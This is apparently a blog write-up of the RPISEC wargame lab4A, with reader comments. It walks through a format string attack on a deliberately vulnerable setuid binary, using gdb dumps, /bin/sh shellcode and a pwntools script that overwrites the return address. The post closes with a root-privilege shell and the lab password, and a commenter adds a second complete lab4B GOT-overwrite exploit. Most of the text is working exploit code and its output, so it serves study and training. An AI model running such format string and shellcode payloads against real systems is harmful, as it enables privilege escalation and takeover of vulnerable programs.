With Full RELRO enabled the entire GOT is remapped as read-only. Thus we cannot alter any values there. Also a STACK CANARY has been found. A stack canary is a random value which is placed on the stack on every function call. When leaving a function, it is verified that the value has not been altered. If the value has changed, the program terminates. When we try to overwrite the return address in a simple buffer overflow, the stack canary gets overwritten because all bytes from the beginning of the buffer up to the return address have to be filled. Since we have identified a format string vulnerability, we can write to one specific address without touching the stack canary. That is why a stack canary will not prevent us from overwriting the return address on the stack, which is what we are going to do here.
Now that we have figured out how to control the instruction pointer, we have to decide where to point it. Fortunately NX is still disabled. This means that we can store a shellcode on the stack and execute it.
What are we going to do?
–> Determine the argument selector for the buffer we can write to (log_buf + offset for strlen(msg)).
–> Determine the address of the buffer, since this is the value we want to write over the return address of the function log_wrapper.
–> Determine the address where the return address is stored.
–> Store a shellcode in the buffer and use the %n specifier to overwrite the return address with the address of the buffer (shellcode).
argument selector
In order to run the program there must be a backups folder in the current directory:
lab4A@warzone:/levels/lab04$ ./lab4A test
ERROR: Failed to open ./backups/.log
lab4A@warzone:/levels/lab04$ mkdir backups
mkdir: cannot create directory ‘backups’: Permission denied
We cannot create a directory in /levels/lab04 and must run the program from somewhere else, for example from /tmp:
lab4A@warzone:/levels/lab04$ cd /tmp
lab4A@warzone:/tmp$ mkdir backups
lab4A@warzone:/tmp$ /levels/lab04/lab4A test
ERROR: Failed to open test
The program prints an error because there is no file called test in the current directory, but the error that the file ./backups/.log cannot be opened is gone. This suffices, since the function log_wrapper has already been called (see line 45 of the source code) and has added a log entry:
lab4A@warzone:/tmp$ cd backups
lab4A@warzone:/tmp/backups$ cat .log
LOG: Starting back up: test
Now we run the program with a filename containing a 4 byte pattern and multiple format specifiers to leak the stack:
lab4A@warzone:/tmp$ /levels/lab04/lab4A AAAA.%8x.%8x.%8x.%8x.%8x.%8x.%8x.%8x.%8x.%8x.%8x.%8x.%8x.%8x.%8x.%8x
ERROR: Failed to open AAAA.%8x.%8x.%8x.%8x.%8x.%8x.%8x.%8x.%8x.%8x.%8x.%8x.%8x.%8x.%8x.%8x
lab4A@warzone:/tmp$ cat backups/.log
LOG: Starting back up: AAAA.b7e9eb73.b7e9548c.bffff842. 8048cda. 804b008.       0.       0.b7e24994.617453c8.6e697472.61622067.75206b63.41203a70.2e414141.39653762.33376265
The 14th element contains our pattern, but only 3 bytes of it (2e414141). The 4th byte is within the 13th element: 41203a70.
That means that we have to add 1 byte at the beginning of the buffer in order to align the characters to the 4 byte chunks on the stack.
We can verify this using the argument selector (do not forget to escape the $ in bash):
lab4A@warzone:/tmp$ /levels/lab04/lab4A XAAAA.%14\$08x
ERROR: Failed to open XAAAA.%14$08x
lab4A@warzone:/tmp$ cat backups/.log
LOG: Starting back up: XAAAA.41414141
The additional X at the beginning of the filename aligns the characters to the 4 byte chunks on the stack.
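The number of padding bytes can also be computed from the leak instead of being read off by eye. The sketch below rebuilds the memory bytes from the first 14 leaked words of the log entry above and searches for the pattern; locate_pattern is a hypothetical helper, not part of the original exploit.

```python
import struct

def locate_pattern(leaked_words, pattern=b"AAAA"):
    """Return (argument_index, byte_offset, pad) for the first hit of pattern."""
    memory = b"".join(struct.pack("<I", int(w, 16)) for w in leaked_words)
    position = memory.find(pattern)
    if position < 0:
        return None
    pad = (4 - position % 4) % 4  # bytes to prepend for 4-byte alignment
    return position // 4 + 1, position % 4, pad

log_line = ("b7e9eb73.b7e9548c.bffff842. 8048cda. 804b008. 0. 0."
            "b7e24994.617453c8.6e697472.61622067.75206b63.41203a70.2e414141")
words = [w.strip() for w in log_line.split(".")]
arg, offset, pad = locate_pattern(words)
aligned_arg = ((arg - 1) * 4 + offset + pad) // 4 + 1
print(arg, offset, pad, aligned_arg)
```

The pattern starts in the last byte of argument 13, so one padding byte moves it to the start of argument 14, matching the X we prepended.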
address of buffer and return address
In order to determine the address of the buffer and the return address we use gdb, keeping in mind that these addresses may vary:
lab4A@warzone:/tmp$ gdb /levels/lab04/lab4A
Reading symbols from /levels/lab04/lab4A...(no debugging symbols found)...done.
gdb-peda$ disassemble log_wrapper
Dump of assembler code for function log_wrapper:
   0x080488fd <+0>:     push ebp
   0x080488fe <+1>:     mov ebp,esp
   0x08048900 <+3>:     push ebx
   ...
   0x08048972 <+117>:   mov eax,DWORD PTR [ebp-0x124]
   0x08048978 <+123>:   mov DWORD PTR [esp+0x8],eax
   0x0804897c <+127>:   mov DWORD PTR [esp+0x4],ebx
   0x08048980 <+131>:   mov DWORD PTR [esp],edx
   0x08048983 <+134>:   call 0x80487c0 <snprintf@plt>
   ...
   0x080489dd <+224>:   pop ebx
   0x080489de <+225>:   pop ebp
   0x080489df <+226>:   ret
End of assembler dump.
The locations we are interested in are the call to snprintf and the ret instruction within the function log_wrapper. We set a breakpoint on each address:
gdb-peda$ b *log_wrapper+134
Breakpoint 1 at 0x8048983
gdb-peda$ b *log_wrapper+226
Breakpoint 2 at 0x80489df
And run the program:
gdb-peda$ r test
Starting program: /levels/lab04/lab4A test
[----------------------------------registers-----------------------------------]
EAX: 0xbffff8eb ("test")
EBX: 0xec
ECX: 0x1d
EDX: 0xbffff56f --> 0x4b00800
ESI: 0x0
EDI: 0x0
EBP: 0xbffff668 --> 0xbffff708 --> 0x0
ESP: 0xbffff530 --> 0xbffff56f --> 0x4b00800
EIP: 0x8048983 (<log_wrapper+134>: call 0x80487c0 <snprintf@plt>)
EFLAGS: 0x286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x8048978 <log_wrapper+123>: mov DWORD PTR [esp+0x8],eax
   0x804897c <log_wrapper+127>: mov DWORD PTR [esp+0x4],ebx
   0x8048980 <log_wrapper+131>: mov DWORD PTR [esp],edx
=> 0x8048983 <log_wrapper+134>: call 0x80487c0 <snprintf@plt>
   0x8048988 <log_wrapper+139>: mov DWORD PTR [esp+0x4],0x8048c90
   0x8048990 <log_wrapper+147>: lea eax,[ebp-0x10b]
   0x8048996 <log_wrapper+153>: mov DWORD PTR [esp],eax
   0x8048999 <log_wrapper+156>: call 0x8048700 <strcspn@plt>
Guessed arguments:
arg[0]: 0xbffff56f --> 0x4b00800
arg[1]: 0xec
arg[2]: 0xbffff8eb ("test")
[------------------------------------stack-------------------------------------]
0000| 0xbffff530 --> 0xbffff56f --> 0x4b00800
0004| 0xbffff534 --> 0xec
0008| 0xbffff538 --> 0xbffff8eb ("test")
0012| 0xbffff53c --> 0xb7e9eb73 (<__GI_strstr+19>: add ebx,0x12e48d)
0016| 0xbffff540 --> 0xb7e9548c (<malloc_init_state+12>: add ebx,0x137b74)
0020| 0xbffff544 --> 0xbffff8eb ("test")
0024| 0xbffff548 --> 0x8048cda ("Starting back up: ")
0028| 0xbffff54c --> 0x804b008 --> 0xfbad2484
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value

Breakpoint 1, 0x08048983 in log_wrapper ()
gdb-peda$
The first breakpoint is hit. We are right before the call to snprintf. The address of the buffer is on the top of the stack: 0xbffff56f.
Let’s continue to the ret instruction:
gdb-peda$ c
Continuing.
[----------------------------------registers-----------------------------------]
EAX: 0x0
EBX: 0xb7fcd000 --> 0x1a9da8
ECX: 0x0
EDX: 0x804b0a0 --> 0x0
ESI: 0x0
EDI: 0x0
EBP: 0xbffff708 --> 0x0
ESP: 0xbffff66c --> 0x8048a8b (<main+171>: mov eax,DWORD PTR [esp+0xc])
EIP: 0x80489df (<log_wrapper+226>: ret)
EFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x80489d7 <log_wrapper+218>: add esp,0x134
   0x80489dd <log_wrapper+224>: pop ebx
   0x80489de <log_wrapper+225>: pop ebp
=> 0x80489df <log_wrapper+226>: ret
   0x80489e0 <main>: push ebp
   0x80489e1 <main+1>: mov ebp,esp
   0x80489e3 <main+3>: and esp,0xfffffff0
   0x80489e6 <main+6>: sub esp,0x90
[------------------------------------stack-------------------------------------]
0000| 0xbffff66c --> 0x8048a8b (<main+171>: mov eax,DWORD PTR [esp+0xc])
0004| 0xbffff670 --> 0x804b008 --> 0xfbad2c84
0008| 0xbffff674 --> 0x8048cda ("Starting back up: ")
0012| 0xbffff678 --> 0xbffff8eb ("test")
0016| 0xbffff67c --> 0xbffff7a4 --> 0xbffff8d7 ("/levels/lab04/lab4A")
0020| 0xbffff680 --> 0x3
0024| 0xbffff684 --> 0x9 ('\t')
0028| 0xbffff688 --> 0xffc0003f
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value

Breakpoint 2, 0x080489df in log_wrapper ()
gdb-peda$
The top of the stack now points to the return address. Thus the address where the return address is stored is just the value of esp: 0xbffff66c.
Now we have got both addresses we were looking for:
–> buffer: 0xbffff56f
–> return address: 0xbffff66c
shellcode and %n specifier
For the shellcode we can just reuse the shellcode we used in the last labs. Because the buffer’s offset to the 4 byte alignment of the stack is 1 byte, I simply prepended nops (0x90) to the shellcode so that it is 25 bytes long: 1 byte for the alignment plus 24 bytes (six 4 byte chunks). This aligns the addresses that follow the shellcode.
The final python-script constructs the format string we can pass to the program as the filename:
lab4A@warzone:/tmp$ cat exploit_lab4A_2.py
import sys
from pwn import *

shellcode = "\x90"\
            "\x90\x31\xc0\x50"\
            "\x68\x2f\x2f\x73"\
            "\x68\x68\x2f\x62"\
            "\x69\x6e\x89\xe3"\
            "\x89\xc1\x89\xc2"\
            "\xb0\x0b\xcd\x80" # len = 25

addr_offset = int(sys.argv[1], 16)
addr_buf = 0xbffff56f - addr_offset
addr_ret_addr = 0xbffff66c - addr_offset

value_u2 = addr_buf >> 16
value_l2 = addr_buf & 0xffff

expl = shellcode
expl += p32(addr_ret_addr+2) # arg selector: $14 + 24/4 = $20
expl += p32(addr_ret_addr) # arg selector: $21
expl += "%" + str(value_u2 - 25 - 8) + "x"
expl += "%20$hn"
expl += "%" + str(value_l2 - value_u2) + "x"
expl += "%21$hn"

sys.stdout.write(expl)
The script basically works like the script in the last levels. Only the values have been adjusted.
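To make the width arithmetic explicit, here is a minimal sketch that rebuilds the same format string using only the Python standard library (struct.pack instead of p32). It is a re-expression for illustration, not the script used above: the function name build_format_string and its parameters are hypothetical, and it assumes that the lower half of the buffer address is larger than the upper half, which holds for the 0xbfff.... stack addresses seen here.

```python
import struct

# Same 25 byte shellcode as in the script above (two nops prepended).
SHELLCODE = (b"\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62"
             b"\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80")


def build_format_string(addr_buf, addr_ret, first_selector=20):
    """Build shellcode + two target addresses + two %hn writes."""
    upper = addr_buf >> 16       # written to addr_ret + 2
    lower = addr_buf & 0xffff    # written to addr_ret
    if lower <= upper:
        raise ValueError("sketch assumes lower half > upper half")

    prefix = SHELLCODE
    prefix += struct.pack("<I", addr_ret + 2)  # argument $20
    prefix += struct.pack("<I", addr_ret)      # argument $21

    # %hn stores the number of characters printed so far, so the first
    # width must account for the 25 + 8 bytes that precede it.
    pad_upper = upper - len(prefix)
    # The counter keeps running, so the second width is only the difference.
    pad_lower = lower - upper

    fmt = "%{}x%{}$hn%{}x%{}$hn".format(
        pad_upper, first_selector, pad_lower, first_selector + 1)
    return prefix + fmt.encode("ascii")


payload = build_format_string(0xbffff56f - 0x60, 0xbffff66c - 0x60)
print(payload[33:].decode("ascii"))
```

For an offset of 0x60 the printed tail is %49118x%20$hn%13584x%21$hn.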
Now we only need to try different offsets until we get a shell:
...
lab4A@warzone:/tmp$ /levels/lab04/lab4A $(python exploit_lab4A_2.py 0x60)
ERROR: Failed to open ββ1βPh//shh/binβββΒ° Νβββ βββ%49118x%20$hn%13584x%21$hn
lab4A@warzone:/tmp$ /levels/lab04/lab4A $(python exploit_lab4A_2.py 0x70)
ERROR: Failed to open ββ1βPh//shh/binβββΒ° Νββββββββ%49118x%20$hn%13568x%21$hn
lab4A@warzone:/tmp$ /levels/lab04/lab4A $(python exploit_lab4A_2.py 0x80)
ERROR: Failed to open ββ1βPh//shh/binβββΒ° Νββββββββ%49118x%20$hn%13552x%21$hn
lab4A@warzone:/tmp$ /levels/lab04/lab4A $(python exploit_lab4A_2.py 0x90)
ERROR: Failed to open (null)
lab4A@warzone:/tmp$ /levels/lab04/lab4A $(python exploit_lab4A_2.py 0xa0)
$ whoami
lab4end
$ cat /home/lab4end/.pass
1t_w4s_ju5t_4_w4rn1ng
Done! The final password is 1t_w4s_ju5t_4_w4rn1ng.
Your writeups are phenomenal. Thank you so much for the help
Thanks :) Great to hear that!
Hey,
your write-ups are very helpful!
Why are you using the “+2” in the lab4B solution (line 23):
expl += p32(exit_got+2)
I didn’t really understand that line…could you please explain?
Thanks!
Hey chak, thanks :)
Of course! The “hn” format specifier is used to write only 2 bytes at a time. As we want to overwrite the full 32-bit (=4 byte) address stored in the GOT entry of exit, we need to do two separate writes.
The GOT entry of exit contains a 4 byte address:
exit_got: [ ][ ][ ][ ]
At first we write the value 0xbfff to exit_got+2. These are actually the upper two bytes:
exit_got: [ ][ ][ff][bf]
Then we write the value 0xf658 to exit_got (these are the lower two bytes):
exit_got: [58][f6][ff][bf]
(Notice that the values are stored in little endian.)
I hope this makes sense :) If you have any other questions, feel free to ask!
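The two half-word writes described above can be simulated in a few lines. This is only an illustrative sketch: the helper write_hn is hypothetical and models what a %hn write does to memory, and the GOT entry is represented by a zero-filled 4 byte bytearray as a placeholder.

```python
import struct


def write_hn(memory, offset, chars_printed):
    """Model of %hn: store the low 16 bits of the printed-character count."""
    struct.pack_into("<H", memory, offset, chars_printed & 0xffff)


# Placeholder for the 4 byte GOT entry of exit (zero-filled for the demo).
got_entry = bytearray(4)

# First write: 0xbfff to exit_got+2 (the upper two bytes).
write_hn(got_entry, 2, 0xbfff)
after_first = bytes(got_entry)

# Second write: 0xf658 to exit_got (the lower two bytes).
write_hn(got_entry, 0, 0xf658)

value = struct.unpack("<I", got_entry)[0]
print(got_entry.hex(), hex(value))
```

After both writes the four bytes read back as the little endian encoding of 0xbffff658, which is why the second address in the payload is exit_got+2.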
Awesome, thanks!
Hi,
Thank you for the great work.
I was playing with the lab4B that I was able to solve but there is something i can’t figure out.
My solution works if I write the payload in a file and then use the cat technique just like you. (python solve.py > /tmp/payload.txt && cat /tmp/payload.txt - | ./lab4B)
But I would like to modify the script in order to solve it without using cat like this: io = process("/levels/lab04/lab4B") [..send the payload using io.sendline()..] io.interactive(), like I did with buffer overflow challenges. But it does not seem to work with io.interactive(). I get “Got EOF while reading in interactive” and the program exits.
Do you have any idea on how to make it work using the io.interactive technique ?
Hey Adrien,
thanks for dropping a comment!
Actually I don’t see any obvious reason why this should not work. Could you share your full script? :)
Yes for sure, you can find it below.
If you copy paste it in /tmp/lab4B.py and run it, you will get a shell:
lab4B@warzone:/levels/lab04$ python /tmp/lab4B.py 0xbffff648 > /tmp/payload.txt && cat /tmp/payload.txt - | ./lab4B
[…]
id
uid=1015(lab4B) gid=1016(lab4B) euid=1016(lab4A) groups=1017(lab4A),1001(gameuser),1016(lab4B)
whoami
lab4A
But if you uncomment the line beginning with “io.” and run it like below, you will get the error message “Got EOF while reading in interactive”.
lab4B@warzone:/levels/lab04$ python /tmp/lab4B.py 0xbffff648
[*] Got EOF while reading in interactive
I use the original VM provided in the RPISEC Github, and I never update the content. So the version of pwntools is outdated (2.2.0).
My first hypothesis was the process spawned by the pwntools might slightly differ from the process spawned directly from the shell ; so the “buf” address might differ too. But after several tests, I’m quite sure the buf address is the same in the two cases.
Thank you for your help, and for your time :).
———————-
#-*- coding:utf-8 -*-
from pwn import *
import sys
payload = "\x31\xc0\x83\xec\x04\x89\x04\x24\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"
bufAdr = int(sys.argv[1], base=16)
high = bufAdr >> 16
low = bufAdr & 0xFFFF
got = 0x080499b8
#io = process("/levels/lab04/lab4B")
padding = 3*"\x90"
offset1 = low - len(payload+padding) - 12
offset2 = high - low if high > low else 0x10000+high - low
#io.sendline(payload+padding+p32(got)+"JUNK"+p32(got+2)+"%"+str(offset1)+"x"+"%15$hn"+"%"+str(offset2)+"x"+"%17$hn")
print(payload+padding+p32(got)+"JUNK"+p32(got+2)+"%"+str(offset1)+"x"+"%15$hn"+"%"+str(offset2)+"x"+"%17$hn")
#print(io.recv(1000))
#io.interactive()
Actually your script is also working for me using the pwn tools functions:
lab4B@warzone:~$ python /tmp/lab4B.py 0xbffff648
[+] Starting program ‘/levels/lab04/lab4B’: Done
…
[*] Switching to interactive mode
…
$ id
uid=1015(lab4B) gid=1016(lab4B) euid=1016(lab4A) groups=1017(lab4A),1001(gameuser),1016(lab4B)
In order to determine what’s going on you can, for example, add raw_input('>') after spawning the process with io = process(…). This will delay the exploit until you hit enter. Then, in another terminal, you can attach gdb to the already running process (this requires root or lab4A privileges, e.g. via the gameadmin user) using sudo gdb /levels/lab04/lab4B $(pidof lab4B). Now you can set a breakpoint, hit enter in the other terminal to trigger your exploit and check what’s going on :)
Well … That’s weird. As you suggested, I debugged with GDB and found that with pwntools, the buf address is located at 0xbffff628 for me.
python /tmp/lab4B.py 0xbffff628 works like a charm.
Again thank you for your time, and for your write-ups. I learn a lot in this course, and it’s priceless to read write-ups from others and discover different points of view and methodologies.
I am glad to hear that. Thank you :)
Hi scryh,
I’m just dropping a comment to thank you for these amazing writeups that have helped me learn so much.
Cheers!
Thank you! Great to hear that :)